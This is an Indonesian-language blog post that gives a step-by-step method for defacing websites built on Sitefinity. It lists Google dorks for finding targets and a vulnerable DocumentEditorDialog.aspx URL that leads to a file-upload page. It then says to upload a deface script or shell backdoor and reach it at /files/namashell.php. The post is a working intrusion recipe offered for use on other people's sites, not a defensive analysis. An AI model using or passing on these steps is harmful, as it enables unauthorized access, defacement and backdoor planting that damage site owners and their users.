--------------------------------
| Mr.
5creamous~ACT |
--------------------------------
{+}
Bahan
Script Deface
Shell Backdoor
{+}
Dork (Kembangkan lagi)
"sitefinity:login"
/Sitefinity/login.aspx
Inurl: “UserControls/Dialogs”
{+} Exploit
http://targetmu.com/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
{+} Akses Shell :
http://targetmu.com/files/namashell.php
1. Langkah awal Dork terlebih dahulu di Google menggunakan Dork di atas
2. Pilih Web yang ingin anda Deface, disini peru kesabaran agar dapat Web yang Vuln.
3. Jika anda sudah masuk pada Sitefinity Login, tambahkan Exploit di belakang URL.
http://targetmu.com/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
4. Web yang Vuln akan langsung di Direct ke Halaman Upload File
5. Setelah itu pilih Script Deface/Shell backdoor kalian, jika Berhasil di Upload maka tampilannya seperti berikut
6. Untuk akses Script Deface/Shell Backdoor kalian tambahkan saja di belakang URL dengan /files/namashell.php Contoh :
http://targetmu.com/files/namashell.php
7. Taraaaaaaaaaa kalian sudah masuk ke Dalam Shell ... :D
8. Setelah itu terserah kalian mau apakan itu web :v ohya kalo mau tebas index biasakan Back Up Script asli terlebih dahulu yaa :D
--------------------------------------------------------------------------------------------------------------------------------
Hasil :
--------------------------------------------------------------------------------------------------------------------------------
Kalo masih bingung langsung tanya aja di kolom komentar cuk :v
Bagikan
Deface Web Metode Sitefinity Editor Dialogs
4/
5
Oleh
Unknown
Saya Menunggu Komentar Anda ...
Jika terdapat File/Link Error segera beritahu Admin di Kolom Komentar di bawah ini, agar secepatnya untuk diperbaiki.